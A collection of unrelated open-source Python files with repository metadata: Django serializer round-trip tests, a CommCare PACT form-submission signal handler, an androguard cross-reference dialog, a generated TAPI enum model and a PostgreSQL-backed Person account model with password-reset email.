self.assertTrue(self._validate_output(serial_str))
def test_serializer_roundtrip(self):
"""Tests that serialized content can be deserialized."""
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all())
models = list(serializers.deserialize(self.serializer_name, serial_str))
self.assertEqual(len(models), 2)
def test_altering_serialized_output(self):
"""
Tests the ability to create new objects by
modifying serialized content.
"""
old_headline = "Poker has no place on ESPN"
new_headline = "Poker has no place on television"
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all())
serial_str = serial_str.replace(old_headline, new_headline)
models = list(serializers.deserialize(self.serializer_name, serial_str))
# Prior to saving, old headline is in place
self.assertTrue(Article.objects.filter(headline=old_headline))
self.assertFalse(Article.objects.filter(headline=new_headline))
for model in models:
model.save()
# After saving, new headline is in place
self.assertTrue(Article.objects.filter(headline=new_headline))
self.assertFalse(Article.objects.filter(headline=old_headline))
def test_one_to_one_as_pk(self):
"""
Tests that if you use your own primary key field
(such as a OneToOneField), it doesn't appear in the
serialized field list - it replaces the pk identifier.
"""
profile = AuthorProfile(author=self.joe,
date_of_birth=datetime(1970, 1, 1))
profile.save()
serial_str = serializers.serialize(self.serializer_name,
AuthorProfile.objects.all())
self.assertFalse(self._get_field_values(serial_str, 'author'))
for obj in serializers.deserialize(self.serializer_name, serial_str):
self.assertEqual(obj.object.pk, self._comparison_value(self.joe.pk))
def test_serialize_field_subset(self):
"""Tests that output can be restricted to a subset of fields"""
valid_fields = ('headline', 'pub_date')
invalid_fields = ("author", "categories")
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all(),
fields=valid_fields)
for field_name in invalid_fields:
self.assertFalse(self._get_field_values(serial_str, field_name))
for field_name in valid_fields:
self.assertTrue(self._get_field_values(serial_str, field_name))
def test_serialize_unicode(self):
"""Tests that unicode makes the roundtrip intact"""
actor_name = "Za\u017c\u00f3\u0142\u0107"
movie_title = 'G\u0119\u015bl\u0105 ja\u017a\u0144'
ac = Actor(name=actor_name)
mv = Movie(title=movie_title, actor=ac)
ac.save()
mv.save()
serial_str = serializers.serialize(self.serializer_name, [mv])
self.assertEqual(self._get_field_values(serial_str, "title")[0], movie_title)
self.assertEqual(self._get_field_values(serial_str, "actor")[0], actor_name)
obj_list = list(serializers.deserialize(self.serializer_name, serial_str))
mv_obj = obj_list[0].object
self.assertEqual(mv_obj.title, movie_title)
def test_serialize_superfluous_queries(self):
"""Ensure no superfluous queries are made when serializing ForeignKeys
#17602
"""
ac = Actor(name='Actor name')
ac.save()
mv = Movie(title='Movie title', actor_id=ac.pk)
mv.save()
with self.assertNumQueries(0):
serializers.serialize(self.serializer_name, [mv])
def test_serialize_with_null_pk(self):
"""
Tests that serialized data with no primary key results
in a model instance with no id
"""
category = Category(name="Reference")
serial_str = serializers.serialize(self.serializer_name, [category])
pk_value = self._get_pk_values(serial_str)[0]
self.assertFalse(pk_value)
cat_obj = list(serializers.deserialize(self.serializer_name,
serial_str))[0].object
self.assertEqual(cat_obj.id, None)
def test_float_serialization(self):
"""Tests that float values serialize and deserialize intact"""
sc = Score(score=3.4)
sc.save()
serial_str = serializers.serialize(self.serializer_name, [sc])
deserial_objs = list(serializers.deserialize(self.serializer_name,
serial_str))
self.assertEqual(deserial_objs[0].object.score, Approximate(3.4, places=1))
def test_custom_field_serialization(self):
"""Tests that custom fields serialize and deserialize intact"""
team_str = "Spartak Moskva"
player = Player()
player.name = "Soslan Djanaev"
player.rank = 1
player.team = Team(team_str)
player.save()
serial_str = serializers.serialize(self.serializer_name,
Player.objects.all())
team = self._get_field_values(serial_str, "team")
self.assertTrue(team)
self.assertEqual(team[0], team_str)
deserial_objs = list(serializers.deserialize(self.serializer_name, serial_str))
self.assertEqual(deserial_objs[0].object.team.to_string(),
player.team.to_string())
def test_pre_1000ad_date(self):
"""Tests that year values before 1000AD are properly formatted"""
# Regression for #12524 -- dates before 1000AD get prefixed
# 0's on the year
a = Article.objects.create(
author=self.jane,
headline="Nobody remembers the early years",
pub_date=datetime(1, 2, 3, 4, 5, 6))
serial_str = serializers.serialize(self.serializer_name, [a])
date_values = self._get_field_values(serial_str, "pub_date")
self.assertEqual(date_values[0].replace('T', ' '), "0001-02-03 04:05:06")
def test_pkless_serialized_strings(self):
"""
Tests that serialized strings without PKs
can be turned into models
"""
deserial_objs = list(serializers.deserialize(self.serializer_name,
self.pkless_str))
for obj in deserial_objs:
self.assertFalse(obj.object.id)
obj.save()
self.assertEqual(Category.objects.all().count(), 5)
def test_deterministic_mapping_ordering(self):
"""Mapping such as fields should be deterministically ordered. (#24558)"""
output = serializers.serialize(self.serializer_name, [self.a1], indent=2)
categories = self.a1.categories.values_list('pk', flat=True)
self.assertEqual(output, self.mapping_ordering_str % {
'article_pk': self.a1.pk,
'author_pk': self.a1.author_id,
'first_category_pk': categories[0],
'second_category_pk': categories[1],
})
def test_deserialize_force_insert(self):
"""Tests that deserialized content can be saved with force_insert as a parameter."""
serial_str = serializers.serialize(self.serializer_name, [self.a1])
deserial_obj = list(serializers.deserialize(self.serializer_name, serial_str))[0]
with mock.patch('django.db.models.Model') as mock_model:
deserial_obj.save(force_insert=False)
mock_model.save_base.assert_called_with(deserial_obj.object, raw=True, using=None, force_insert=False)
class SerializersTransactionTestBase(object):
available_apps = ['serializers']
@skipUnlessDBFeature('supports_forward_references')
def test_forward_refs(self):
"""
Tests that object ids can be referenced before they are
defined in the serialization data.
"""
# The deserialization process needs to run in a transaction in order
# to test forward reference handling.
with transaction.atomic():
objs = serializers.deserialize(self.serializer_name, self.fwd_ref_str)
with connection.constraint_checks_disabled():
for obj in objs:
obj.save()
for model_cls in (Category, Author, Article):
self.assertEqual(model_cls.objects.all().count(), 1)
art_obj = Article.objects.all()[0]
self.assertEqual(art_obj.categories.all().count(), 1)
self.assertEqual(art_obj.author.name, "Agnes")
class XmlSerializerTestCase(SerializersTestBase, TestCase):
serializer_name = "xml"
pkless_str = """<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object model="serializers.category">
<field type="CharField" name="name">Reference</field>
</object>
<object model="serializers.category">
<field type="CharField" name="name">Non-fiction</field>
</object>
</django-objects>"""
mapping_ordering_str = """<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object model="serializers.article" pk="%(article_pk)s">
<field name="author" rel="ManyToOneRel" to="serializers.author">%(author_pk)s</field>
<field name="headline" type="CharField">Poker has no place on ESPN</field>
<field name="pub_date" type="DateTimeField">2006-06-16T11:00:00</field>
<field name="categories" rel="ManyToManyRel" to="serializers.category"><object pk="%(first_category_pk)s"></object><object pk="%(second_category_pk)s"></object></field>
<field name="meta_data" rel="ManyToManyRel" to="serializers.categorymetadata"></field>
</object>
</django-objects>"""
@staticmethod
def _comparison_value(value):
# The XML serializer handles everything as strings, so comparisons
# need to be performed on the stringified value
return six.text_type(value)
@staticmethod
def _validate_output(serial_str):
try:
minidom.parseString(serial_str)
except Exception:
return False
else:
return True
@staticmethod
def _get_pk_values(serial_str):
ret_list = []
dom = minidom.parseString(serial_str)
fields = dom.getElementsByTagName("object")
for field in fields:
ret_list.append(field.getAttribute("pk"))
return ret_list
@staticmethod
def _get_field_values(serial_str, field_name):
ret_list = []
dom = minidom.parseString(serial_str)
fields = dom.getElementsByTagName("field")
for field in fields:
if field.getAttribute("name") == field_name:
temp = []
for child in field.childNodes:
temp.append(child.nodeValue)
ret_list.append("".join(temp))
return ret_list
def test_control_char_failure(self):
"""
Serializing control characters with XML should fail as those characters
are not supported in the XML 1.0 standard (except HT, LF, CR).
"""
self.a1.headline = "This contains \u0001 control \u0011 chars"
msg = "Article.headline (pk:%s) contains unserializable characters" % self.a1.pk
with self.assertRaisesMessage(ValueError, msg):
serializers.serialize(self.serializer_name, [self.a1])
self.a1.headline = "HT \u0009, LF \u000A, and CR \u000D are allowed"
self.assertIn(
"HT \t, LF \n, and CR \r are allowed",
serializers.serialize(self.serializer_name, [self.a1])
)
class XmlSerializerTransactionTestCase(SerializersTransactionTestBase, TransactionTestCase):
serializer_name = "xml"
fwd_ref_str = """<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object pk="1" model="serializers.article">
<field to="serializers.author" name="author" rel="ManyToOneRel">1</field>
<field type="CharField" name="headline">Forward references pose no problem</field>
<field type="DateTimeField" name="pub_date">2006-06-16T15:00:00</field>
<field to="serializers.category" name="categories" rel="ManyToManyRel">
<object pk="1"></object>
</field>
<field to="serializers.categorymetadata" name="meta_data" rel="ManyToManyRel"></field>
</object>
<object pk="1" model="serializers.author">
<field type="CharField" name="name">Agnes</field>
</object>
<object pk="1" model="serializers.category">
<field type="CharField" name="name">Reference</field></object>
</django-objects>"""
class JsonSerializerTestCase(SerializersTestBase, TestCase):
serializer_name = "json"
pkless_str = """[
{
"pk": null,
"model": "serializers.category",
"fields": {"name": "Reference"}
}, {
"model": "serializers.category",
"fields": {"name": "Non-fiction"}
}]"""
mapping_ordering_str = """[
{
"model": "serializers.article",
"pk": %(article_pk)s,
"fields": {
"author": %(author_pk)s,
"headline": "Poker has no place on ESPN",
"pub_date": "2006-06-16T11:00:00",
"categories": [
%(first_category_pk)s,
%(second_category_pk)s
],
"meta_data": []
}
}
]
"""
@staticmethod
def _validate_output(serial_str):
try:
json.loads(serial_str)
except Exception:
return False
else:
return True
@staticmethod
def _get_pk_values(serial_str):
ret_list = []
serial_list = json.loads(serial_str)
for obj_dict in serial_list:
ret_list.append(obj_dict["pk"])
return ret_list
@staticmethod
def _get_field_values(serial_str, field_name):
ret_list = []
serial_list = json.loads(serial_str)
for obj_dict in serial_list:
if field_name in obj_dict["fields"]:
ret_list.append(obj_dict["fields"][field_name])
return ret_list
def test_indentation_whitespace(self):
Score.objects.create(score=5.0)
Score.objects.create(score=6.0)
qset = Score.objects.all()
s = serializers.json.Serializer()
json_data = s.serialize(qset, indent=2)
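# Regression check: with indent enabled, any line ending in a comma must not carry trailing whitespace.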
for line in json_data.splitlines():
if re.search(r'.+,\s*$', line):
self.assertEqual(line, line.rstrip())
def test_helpful_error_message_invalid_pk(self):
"""
If there is an invalid primary key, the error message should contain
the model associated with it.
"""
test_string = """[{
"pk": "badpk",
"model": "serializers.player",
"fields": {
"name": "Bob",
"rank": 1,
"team": "Team"
}
}]"""
with self.assertRaisesMessage(serializers.base.DeserializationError, "(serializers.player:pk=badpk)"):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_invalid_field(self):
"""
If there is an invalid field value, the error message should contain
the model associated with it.
"""
test_string = """[{
"pk": "1",
"model": "serializers.player",
"fields": {
"name": "Bob",
"rank": "invalidint",
"team": "Team"
}
}]"""
expected = "(serializers.player:pk=1) field_value was 'invalidint'"
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_for_foreign_keys(self):
"""
Invalid foreign keys with a natural key should throw a helpful error
message that identifies the failing key.
"""
test_string = """[{
"pk": 1,
"model": "serializers.category",
"fields": {
"name": "Unknown foreign key",
"meta_data": [
"doesnotexist",
"metadata"
]
}
}]"""
key = ["doesnotexist", "metadata"]
expected = "(serializers.category:pk=1) field_value was '%r'" % key
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_for_many2many_non_natural(self):
"""
Invalid many-to-many keys should throw a helpful error message.
"""
test_string = """[{
"pk": 1,
"model": "serializers.article",
"fields": {
"author": 1,
"headline": "Unknown many to many",
"pub_date": "2014-09-15T10:35:00",
"categories": [1, "doesnotexist"]
}
}, {
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}, {
"pk": 1,
"model": "serializers.category",
"fields": {
"name": "Reference"
}
}]"""
expected = "(serializers.article:pk=1) field_value was 'doesnotexist'"
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_for_many2many_natural1(self):
"""
Invalid many-to-many keys should throw a helpful error message.
This tests the code path where one of a list of natural keys is invalid.
"""
test_string = """[{
"pk": 1,
"model": "serializers.categorymetadata",
"fields": {
"kind": "author",
"name": "meta1",
"value": "Agnes"
}
}, {
"pk": 1,
"model": "serializers.article",
"fields": {
"author": 1,
"headline": "Unknown many to many",
"pub_date": "2014-09-15T10:35:00",
"meta_data": [
["author", "meta1"],
["doesnotexist", "meta1"],
["author", "meta1"]
]
}
}, {
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}]"""
key = ["doesnotexist", "meta1"]
expected = "(serializers.article:pk=1) field_value was '%r'" % key
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
for obj in serializers.deserialize('json', test_string):
obj.save()
def test_helpful_error_message_for_many2many_natural2(self):
"""
Invalid many-to-many keys should throw a helpful error message. This
tests the code path where a natural many-to-many key has only a single
value.
"""
test_string = """[{
"pk": 1,
"model": "serializers.article",
"fields": {
"author": 1,
"headline": "Unknown many to many",
"pub_date": "2014-09-15T10:35:00",
"meta_data": [1, "doesnotexist"]
}
}, {
"pk": 1,
"model": "serializers.categorymetadata",
"fields": {
"kind": "author",
"name": "meta1",
"value": "Agnes"
}
}, {
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}]"""
expected = "(serializers.article:pk=1) field_value was 'doesnotexist'"
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
for obj in serializers.deserialize('json', test_string, ignore=False):
obj.save()
class JsonSerializerTransactionTestCase(SerializersTransactionTestBase, TransactionTestCase):
serializer_name = "json"
fwd_ref_str = """[
{
"pk": 1,
"model": "serializers.article",
"fields": {
"headline": "Forward references pose no problem",
"pub_date": "2006-06-16T15:00:00",
"categories": [1],
"author": 1
}
},
{
"pk": 1,
"model": "serializers.category",
"fields": {
"name": "Reference"
}
},
{
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}]"""
YAML_IMPORT_ERROR_MESSAGE = r'No module named yaml'
class YamlImportModuleMock(object):
"""Provides a wrapped import_module function to simulate yaml ImportError
In order to run tests that verify the 'no yaml installed' behavior even on
a system that does have yaml installed (like the Django CI server), mock
import_module so that it raises an ImportError whenever the yaml serializer
is imported. The importlib.import_module() call is made in
serializers.register_serializer().
Refs: #12756
"""
def __init__(self):
self._import_module = importlib.import_module
def import_module(self, module_path):
if module_path == serializers.BUILTIN_SERIALIZERS['yaml']:
raise ImportError(YAML_IMPORT_ERROR_MESSAGE)
return self._import_module(module_path)
class NoYamlSerializerTestCase(SimpleTestCase):
"""Not having pyyaml installed provides a misleading error
Refs: #12756
"""
@classmethod
def setUpClass(cls):
"""Removes imported yaml and stubs importlib.import_module"""
super(NoYamlSerializerTestCase, cls).setUpClass()
cls._import_module_mock = YamlImportModuleMock()
importlib.import_module = cls._import_module_mock.import_module
# clear out cached serializers to emulate yaml missing
serializers._serializers = {}
@classmethod
def tearDownClass(cls):
"""Puts yaml back if necessary"""
super(NoYamlSerializerTestCase, cls).tearDownClass()
importlib.import_module = cls._import_module_mock._import_module
# clear out cached serializers to clean out BadSerializer instances
serializers._serializers = {}
def test_serializer_pyyaml_error_message(self):
"""Using yaml serializer without pyyaml raises ImportError"""
jane = Author(name="Jane")
self.assertRaises(ImportError, serializers.serialize, "yaml", [jane])
def test_deserializer_pyyaml_error_message(self):
"""Using yaml deserializer without pyyaml raises ImportError"""
self.assertRaises(ImportError, serializers.deserialize, "yaml", "")
def test_dumpdata_pyyaml_error_message(self):
"""Calling dumpdata produces an error when yaml package missing"""
with six.assertRaisesRegex(self, management.CommandError, YAML_IMPORT_ERROR_MESSAGE):
management.call_command('dumpdata', format='yaml')
@unittest.skipUnless(HAS_YAML, "No yaml library detected")
class YamlSerializerTestCase(SerializersTestBase, TestCase):
serializer_name = "yaml"
fwd_ref_str = """- fields:
headline: Forward references pose no problem
pub_date: 2006-06-16 15:00:00
categories: [1]
author: 1
pk: 1
model: serializers.article
- fields:
name: Reference
pk: 1
model: serializers.category
- fields:
name: Agnes
pk: 1
model: serializers.author"""
pkless_str = """- fields:
name: Reference
pk: null
model: serializers.category
- fields:
name: Non-fiction
model: serializers.category"""
mapping_ordering_str = """- model: serializers.article
pk: %(article_pk)s
fields:
author: %(author_pk)s
headline: Poker has no place on ESPN
pub_date: 2006-06-16 11:00:00
categories: [%(first_category_pk)s, %(second_category_pk)s]
meta_data: []
"""
@staticmethod
def _validate_output(serial_str):
try:
yaml.safe_load(StringIO(serial_str))
except Exception:
return False
else:
return True
@staticmethod
def _get_pk_values(serial_str):
ret_list = []
stream = StringIO(serial_str)
for obj_dict in yaml.safe_load(stream):
ret_list.append(obj_dict["pk"])
return ret_list
@staticmethod
def _get_field_values(serial_str, field_name):
ret_list = []
stream = StringIO(serial_str)
for obj_dict in yaml.safe_load(stream):
if "fields" in obj_dict and field_name in obj_dict["fields"]:
field_value = obj_dict["fields"][field_name]
# yaml.safe_load will return non-string objects for some of the
# fields we are interested in; this ensures that everything
# comes back as a string
if isinstance(field_value, six.string_types):
ret_list.append(field_value)
else:
ret_list.append(str(field_value))
return ret_list
@unittest.skipUnless(HAS_YAML, "No yaml library detected")
class YamlSerializerTransactionTestCase(SerializersTransactionTestBase, TransactionTestCase):
serializer_name = "yaml"
fwd_ref_str = """- fields:
headline: Forward references pose no problem
pub_date: 2006-06-16 15:00:00
categories: [1]
author: 1
pk: 1
model: serializers.article
- fields:
name: Reference
pk: 1
model: serializers.category
- fields:
name: Agnes
pk: 1
model: serializers.author"""
| {
"content_hash": "ee21e1a29a2c776f719f064444b2230e",
"timestamp": "",
"source": "github",
"line_count": 819,
"max_line_length": 172,
"avg_line_length": 36.030525030525034,
"alnum_prop": 0.5965298722423668,
"repo_name": "hcsturix74/django",
"id": "505e599f5e517f31b3d6739a30b331d0ae7206c0",
"size": "29533",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tests/serializers/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "48399"
},
{
"name": "HTML",
"bytes": "175276"
},
{
"name": "JavaScript",
"bytes": "238848"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11126030"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
from corehq.apps.users.models import CouchUser
from dimagi.utils.logging import notify_exception
from pact.utils import get_case_id
from couchforms.signals import successful_form_received
import traceback
#placeholder for doing blocking vs. async via celery
BLOCKING = True
def process_dots_submission(sender, xform, **kwargs):
from pact.tasks import recalculate_dots_data, eval_dots_block
try:
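# Only PACT DOTS submissions are handled; any other xmlns falls through immediately.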
if xform.xmlns != "http://dev.commcarehq.org/pact/dots_form":
return
#grrr, if we were on celery 3.0, we could do this!
# chain = eval_dots_block.s(xform.to_json()) | recalculate_dots_data.s(case_id)
# chain()
eval_dots_block(xform.to_json())
case_id = get_case_id(xform)
# get user from xform
user_id = xform.metadata.userID
cc_user = CouchUser.get_by_user_id(user_id)
last_sync_token = getattr(xform, 'last_sync_token', None)
recalculate_dots_data(case_id, cc_user, sync_token=last_sync_token)
except Exception as ex:
tb = traceback.format_exc()
notify_exception(None, message="Error processing PACT DOT submission due to an unknown error: %s\n\tTraceback: %s" % (ex, tb))
#xform_saved.connect(process_dots_submission)
successful_form_received.connect(process_dots_submission)
| {
"content_hash": "ead653cfd067d26dd807655191be7b3d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 134,
"avg_line_length": 37.8,
"alnum_prop": 0.6817838246409675,
"repo_name": "qedsoftware/commcare-hq",
"id": "19af09f4ae127392cb0229d190d9bb3dd0553541",
"size": "1323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "custom/_legacy/pact/signals.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "508392"
},
{
"name": "HTML",
"bytes": "2869325"
},
{
"name": "JavaScript",
"bytes": "2395360"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "125298"
},
{
"name": "Python",
"bytes": "14670713"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
} |
from PySide import QtCore, QtGui
from androguard.core import androconf
from androguard.gui.helpers import display2classmethod, class2func, classmethod2display, method2func
from androguard.gui.sourcewindow import SourceWindow
class XrefDialog(QtGui.QDialog):
'''Dialog holding our Xref listview.
parent: SourceWindow that started the new XrefDialog
path: complete path of the class we are looking for xrefs from
method (optional): method of the class we are looking for xrefs from
xrefs_list: the list of "Class -> Method" strings representing the xrefs
path/method are used for the title of the window
xrefs_list for the content of the QListView
'''
def __init__(self, parent=None, win=None, xrefs_list=None, path="", method=""):
super(XrefDialog, self).__init__(parent)
if not isinstance(xrefs_list, list) or len(xrefs_list) == 0:
androconf.warning("Bad XrefDialog creation")
return
if not method:
title = "Xrefs to %s" % path.split("/")[-1]
else:
title = "Xrefs to %s -> %s" % (path.split("/")[-1], method)
self.setWindowTitle(title)
layout = QtGui.QGridLayout()
xrefwin = XrefListView(self, win=win, xrefs=xrefs_list)
layout.addWidget(xrefwin, 0, 0)
self.setLayout(layout)
@classmethod
def get_xrefs_list(cls, d, path, method=None):
'''Class method called before creating an XrefDialog
to check if there are xrefs to display
path: complete path of the class we are looking for xrefs from
method (optional): method of the class we are looking for xrefs from
'''
arg = class2func(path)
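# class2func/method2func (from androguard.gui.helpers) presumably translate a class path or
# method name into the attribute name that the DalvikVMFormat object exposes for it.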
try:
class_item = getattr(d, arg)
except AttributeError:
androconf.debug("no class: %s in DalvikVMFormat d" % arg)
return None
if not method:
item = class_item
else:
arg3 = None
if isinstance(method, str):
arg2 = method2func(method)
else:
arg2 = method2func(method.get_name())
arg3 = method2func("%s/%s" % (method.get_name(),
method.get_descriptor()))
try:
item = getattr(class_item, arg2)
except AttributeError:
if arg3 is not None:
try:
item = getattr(class_item, arg3)
except AttributeError:
androconf.debug("no method: %s in class: %s" % (arg3, arg))
return None
else:
androconf.debug("no method: %s in class: %s" % (arg2, arg))
return None
androconf.debug("Getting XREFs for: %s" % arg)
if not hasattr(item, "XREFfrom"):
androconf.debug("No xref found")
return None
return XrefDialog.get_xrefs_list_from_element(item)
@classmethod
def get_xrefs_list_from_element(cls, element):
'''Helper for get_xrefs_list
element is a ClassDefItem or MethodDefItem
By the end of the function we no longer know whether we worked on
a class or a method, but we do not care for now.
'''
xref_items = element.XREFfrom.items
androconf.debug("%d XREFs found" % len(xref_items))
# print xref_items
xrefs = []
for xref_item in xref_items:
class_ = xref_item[0].get_class_name()
method_ = xref_item[0].get_name()
descriptor_ = xref_item[0].get_descriptor()
xrefs.append(classmethod2display(class_, method_, descriptor_))
# print xrefs
return xrefs
class XrefListView(QtGui.QListView):
'''List view implemented inside the XrefDialog to list all the Xref of
a particular class or method.
'''
def __init__(self, parent=None, win=None, xrefs=None):
super(XrefListView, self).__init__(parent)
self.setMinimumSize(600, 400) #TODO: adjust window depending on text displayed
self.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.mainwin = win
self.parent = parent
self.doubleClicked.connect(self.doubleClickedHandler)
model = QtGui.QStandardItemModel(self)
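# One row per "Class -> Method" xref string; double-clicking a row opens it in a SourceWindow.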
for x in xrefs:
item = QtGui.QStandardItem(x)
model.appendRow(item)
self.setModel(model)
def doubleClickedHandler(self, index):
'''Signal sent by PySide when a QModelIndex element is clicked'''
path, method = display2classmethod(index.data())
self.mainwin.openSourceWindow(path, method)
self.parent.close()
| {
"content_hash": "620f00c7d6b1943a86fb9158174ee852",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 100,
"avg_line_length": 37.57142857142857,
"alnum_prop": 0.5918884664131813,
"repo_name": "ApplauseAQI/androguard",
"id": "3c6a3bccd9c9445dfe741663e170a263de91683f",
"size": "4734",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "androguard/gui/xrefwindow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "384130"
},
{
"name": "C++",
"bytes": "57006"
},
{
"name": "JavaScript",
"bytes": "2205"
},
{
"name": "Makefile",
"bytes": "6008"
},
{
"name": "Python",
"bytes": "1731263"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server import util
class TapiCommonDirectiveValue(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
"""
allowed enum values
"""
MINIMIZE = "MINIMIZE"
MAXIMIZE = "MAXIMIZE"
ALLOW = "ALLOW"
DISALLOW = "DISALLOW"
DONT_CARE = "DONT_CARE"
def __init__(self): # noqa: E501
"""TapiCommonDirectiveValue - a model defined in OpenAPI
"""
self.openapi_types = {
}
self.attribute_map = {
}
@classmethod
def from_dict(cls, dikt) -> 'TapiCommonDirectiveValue':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The tapi.common.DirectiveValue of this TapiCommonDirectiveValue. # noqa: E501
:rtype: TapiCommonDirectiveValue
"""
return util.deserialize_model(dikt, cls)
| {
"content_hash": "474b8ccf49ed3df0fdc3de4771eb6a95",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 96,
"avg_line_length": 25.636363636363637,
"alnum_prop": 0.6312056737588653,
"repo_name": "karthik-sethuraman/ONFOpenTransport",
"id": "abef1a8bde0ff83221f770cdf53d2125e978c2d9",
"size": "1145",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "RI/flask_server/tapi_server/models/tapi_common_directive_value.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "836"
},
{
"name": "D",
"bytes": "2195"
},
{
"name": "Python",
"bytes": "960828"
},
{
"name": "Shell",
"bytes": "3059"
}
],
"symlink_target": ""
} |
import copy
import logging
import os
import textwrap
import urllib
import uuid
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import itsdangerous
import psycopg2.extras
from profiles import configwrapper
log = logging.getLogger(__name__)
class PersonFactory(psycopg2.extras.CompositeCaster):
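# Composite caster, presumably registered via psycopg2.extras.register_composite, so that
# columns cast with (people.*)::people come back as Person instances instead of plain tuples.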
def make(self, values):
d = dict(zip(self.attnames, values))
return Person(**d)
class Person(object):
def __init__(self, person_uuid, email_address, salted_hashed_password,
person_status, display_name, is_superuser,
inserted,
updated):
self.person_uuid = person_uuid
self.email_address = email_address
self.salted_hashed_password = salted_hashed_password
self.person_status = person_status
self.display_name = display_name
self.is_superuser = is_superuser
self.inserted = inserted
self.updated = updated
def __repr__(self):
return '<{0}.{1} ({2}:{3}) at 0x{4:x}>'.format(
self.__class__.__module__,
self.__class__.__name__,
self.person_uuid,
self.display_name,
id(self))
def __eq__(self, other):
return self.person_uuid == getattr(other, 'person_uuid', -1)
@classmethod
def insert(cls, pgconn, email_address, raw_password,
display_name):
"""
Insert a new person
"""
cursor = pgconn.cursor()
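# Hashing happens in the database: crypt(..., gen_salt('bf')) from the pgcrypto extension
# stores a bcrypt hash, so the raw password never lands in the people table.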
cursor.execute("""
insert into people
(email_address, display_name,
salted_hashed_password, person_status)
values
(
%(email_address)s, %(display_name)s,
crypt(%(raw_password)s, gen_salt('bf')),
'confirmed'
)
returning (people.*)::people as person
""",{'email_address':email_address, 'display_name':display_name,
'raw_password':raw_password })
new_person = cursor.fetchone().person
return new_person
@classmethod
def by_email_address(cls, pgconn, email_address):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select (p.*)::people as p
from people p
where email_address = %(email_address)s
"""), {'email_address': email_address})
if cursor.rowcount:
return cursor.fetchone().p
else:
raise KeyError("Sorry, couldn't find {0}!".format(
email_address))
@classmethod
def select_all(cls, pgconn, offset=0, limit=10, sort='asc'):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select (p.*)::people as p
from people p
order by display_name
"""))
for row in cursor:
yield row.p
@classmethod
def select_count(cls, pgconn):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select count(*)
from people
"""))
return cursor.fetchone().count
@property
def __jsondata__(self):
d = copy.copy(self.__dict__)
d['my_scan_report'] = "/csv/{0}".format(self.my_scan_report_file_name)
return d
@classmethod
def by_person_uuid(cls, pgconn, person_uuid):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
select (p.*)::people as p
from people p
where person_uuid = %(person_uuid)s
"""), {'person_uuid': person_uuid})
if cursor.rowcount:
return cursor.fetchone().p
def send_reset_password_email(self, cw):
signer = itsdangerous.URLSafeTimedSerializer(cw.app_secret)
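# URLSafeTimedSerializer signs and timestamps the payload embedded in the reset link, so the
# endpoint that handles the link can verify it (and enforce an expiry) with the same
# app_secret -- assuming that is how the receiving view is wired up.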
tmpl = cw.j.get_template("emailtemplates/password-reset.html")
html_email = MIMEText(tmpl.render({
"email_address": self.email_address,
"host": cw.host,
"web_host": cw.web_host,
"payload": signer.dumps({
"email_address": self.email_address}),
}
), "html")
msg = MIMEMultipart('alternative')
msg['Subject'] = "Password Reset for {0}".format(self.display_name)
msg['From'] = "streamliner@{0}".format(cw.host)
msg['To'] = self.email_address
msg.attach(html_email)
smtp_connection = cw.make_smtp_connection()
smtp_connection.sendmail(
"streamliner@{0}".format(cw.host),
[self.email_address],
msg.as_string())
log.info("Just sent confirm-signup email")
def update_my_password(self, pgconn, current_password,
new_password):
cursor = pgconn.cursor()
cursor.execute(textwrap.dedent("""
update people
set salted_hashed_password = crypt(
%(new_password)s, gen_salt('bf'))
where person_uuid = %(person_uuid)s
and salted_hashed_password = crypt(
%(current_password)s,
salted_hashed_password)
returning (people.*)::people as p
"""), dict(
new_password=new_password,
person_uuid=self.person_uuid,
current_password=current_password))
